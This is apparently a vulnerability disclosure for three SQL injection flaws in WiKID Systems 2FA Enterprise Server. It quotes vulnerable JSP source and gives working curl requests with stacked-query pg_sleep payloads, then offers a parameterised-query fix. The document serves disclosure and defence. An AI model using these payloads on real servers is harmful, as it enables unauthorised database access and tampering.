A SQL Injection vulnerability, CVE-2019-16917, was identified on WiKID Systems 2FA Enterprise Server through version 4.2.0-b2047. The uid and domain parameters, used by searchDevices.jsp, are not sanitized before being included in a SQL query, thus allowing an authenticated user to create, read, update, or delete information in the database.

Tested on WiKID Systems 2FA Enterprise Server 4.2.0-b2032 and disclosed to WiKID Systems.

The source code for searchDevices.jsp reveals the buildSearchWhereClause function, in which the uid and domain parameters are retrieved:
    private void buildSearchWhereClause(HttpServletRequest request) {
        where = "";
        String uid=request.getParameter("uid");
        String domain=request.getParameter("domain");
If the domain parameter is set and the uid parameter is not set, the domain value is concatenated directly into the query, allowing SQL injection here:

        }else if(!domain.equals("0") && uid==null){
            where="where domainid="+domain;
If the uid parameter is set, the domain value is still concatenated into the query, allowing SQL injection here:

        }else if(uid!=null){
            ...
            if(!domain.equals("0")){
                where=where+" and domainid="+domain;
            }
        }
    }
The backend database is Postgres, which supports stacked queries. A value such as 1; select pg_sleep(10);-- will cause the database and application to hang for 10+ seconds: the original query executes, followed by a second query that sleeps for 10 seconds.

    SLEEP=10; HOST=$RHOST; COOKIE=$COOKIE; time curl -v -i -s -k -X 'POST' -H "Host: $HOST" -H "Cookie: JSESSIONID=$COOKIE;" --data-binary "uid=test&domain=1;select pg_sleep($SLEEP);--&action=Search" https://$HOST/WiKIDAdmin/searchDevices.jsp
If the uid parameter is set, the logic drops down to the following block, where the uid value is concatenated into the query:

        }else if(uid!=null){
            uid=uid.toLowerCase().trim();
            String ask=uid.substring(uid.length()-1);
            if(ask!=null ){
                // uid=uid.substring(0,uid.length()-1);
                where="where RTRIM(LOWER(userid)) like LOWER('%"+uid+"%')";
            // }else{
            //     where="where RTRIM(LOWER(userid))=LOWER('"+uid+"')";
            }
A request such as the following will trigger the issue, causing the application to delay for 10+ seconds:

    SLEEP=10; HOST=$RHOST; COOKIE=$COOKIE; time curl -v -i -s -k -X 'POST' -H "Host: $HOST" -H "Cookie: JSESSIONID=$COOKIE;" --data-binary "uid=1;select pg_sleep($SLEEP);--&action=Search" https://$HOST/WiKIDAdmin/searchDevices.jsp
A SQL Injection vulnerability, CVE-2019-17117, was identified on WiKID Systems 2FA Enterprise Server through version 4.2.0-b2053. The key parameter, used in processPref.jsp, is not sanitized before being included in a SQL query, thus allowing an authenticated user to create, read, update, or delete arbitrary information in the database.

Tested on WiKID Systems 2FA Enterprise Server 4.2.0-b2032.

The source code for processPref.jsp reveals the following code block:
    } else if (request.getParameter("action").equals("Update")) {
        // need to do error checking here.
        sql = "SELECT key FROM parms1to1 where key='" + request.getParameter("key") + "'";
        ResultSet result = stat.executeQuery(sql);
        if (!result.next()) {
    %>
If the action parameter is set to Update, the key parameter is included in a SQL query used to retrieve the parameter that will be updated. The key value is not sanitized before it is included in the query. A request such as:

    https://$RHOST/WiKIDAdmin/processPref.jsp?action=Update&key=test%27;%20SELECT%20pg_sleep(5);--

will cause the application to delay for at least 5 seconds.
Multiple SQL Injection vulnerabilities, CVE-2019-17119, were identified on WiKID Systems 2FA Enterprise Server through version 4.2.0-b2053. The substring and source parameters, used by Logs.jsp, are not sanitized before being included in a SQL query, thus allowing an authenticated user to create, read, update, or delete arbitrary information in the database.

Tested on WiKID Systems 2FA Enterprise Server 4.2.0-b2032.

The source code for Logs.jsp reveals the following logic:
    private String createSourceFilter(HttpServletRequest request) {
        String source = getLogConfig(request).get("source");
        if (source == null || "None".equals(source)) {
            return " ";
        }
        return " and logger_name = '" + source + "' ";
    }

    private String createSubStringFilter(HttpServletRequest request) {
        String subString = getLogConfig(request).get("subString");
        if (subString == null || subString.trim().length() == 0) {
            return " ";
        }
        return " and rendered_message like '%" + subString + "%' ";
    }
createSourceFilter reads the source parameter and concatenates its value into the query being constructed; createSubStringFilter reads the subString parameter and concatenates its value into the same query.
The following requests can be used to demonstrate that the parameters are vulnerable. They take advantage of stacked queries in Postgres: a second query is issued that causes the database and application to delay for 5+ seconds.

    time curl --output /dev/null -s -k -H "Cookie: JSESSIONID=$COOKIE" --data-binary "source='; select pg_sleep(5);--" https://$RHOST/WiKIDAdmin/Log.jsp
    real 0m10.572s
    user 0m0.008s
    sys 0m0.016s

    time curl --output /dev/null -s -k -H "Cookie: JSESSIONID=$COOKIE" --data-binary "subString='; select pg_sleep(5);--" https://$RHOST/WiKIDAdmin/Log.jsp
    real 0m10.572s
    user 0m0.008s
    sys 0m0.016s
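As an added example (not WiKID's code), the following rewrites the buildSearchWhereClause logic from searchDevices.jsp so that every request value reaches the database as a bind parameter of a PreparedStatement instead of being concatenated into the SQL text; the same change removes the key, source and subString concatenations in processPref.jsp and Logs.jsp. The class name, the parseDomainId and escapeLike helpers and the "devices" table name are assumptions.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.ArrayList;
import java.util.List;
import javax.servlet.http.HttpServletRequest;

// Hypothetical helper that rebuilds the searchDevices.jsp where clause with
// bind parameters; the table name "devices" is assumed.
public class DeviceSearchFilter {
    private final StringBuilder where = new StringBuilder();
    private final List<Object> params = new ArrayList<>();

    public DeviceSearchFilter(HttpServletRequest request) {
        String uid = request.getParameter("uid");
        Integer domainId = parseDomainId(request.getParameter("domain"));
        if (uid != null) {
            // Same substring match as the original, but the pattern is bound,
            // not concatenated, and LIKE wildcards in the input are escaped.
            where.append("where RTRIM(LOWER(userid)) like ? escape '\\'");
            params.add("%" + escapeLike(uid.toLowerCase().trim()) + "%");
            if (domainId != null) {
                where.append(" and domainid = ?");
                params.add(domainId);
            }
        } else if (domainId != null) {
            where.append("where domainid = ?");
            params.add(domainId);
        }
    }

    // domainid is numeric; "0" is the original's all-domains sentinel and
    // anything that is not an integer is rejected instead of reaching SQL.
    static Integer parseDomainId(String domain) {
        if (domain == null || domain.equals("0")) return null;
        try {
            return Integer.valueOf(domain.trim());
        } catch (NumberFormatException e) {
            return null;
        }
    }

    static String escapeLike(String s) {
        return s.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_");
    }

    public ResultSet execute(Connection conn) throws SQLException {
        PreparedStatement ps = conn.prepareStatement("select * from devices " + where);
        for (int i = 0; i < params.size(); i++) ps.setObject(i + 1, params.get(i));
        return ps.executeQuery();
    }
}
```

With the values bound this way, a domain of 1;select pg_sleep(10);-- is rejected by parseDomainId and a uid containing quotes or semicolons is matched literally, so the stacked-query delay shown above no longer occurs.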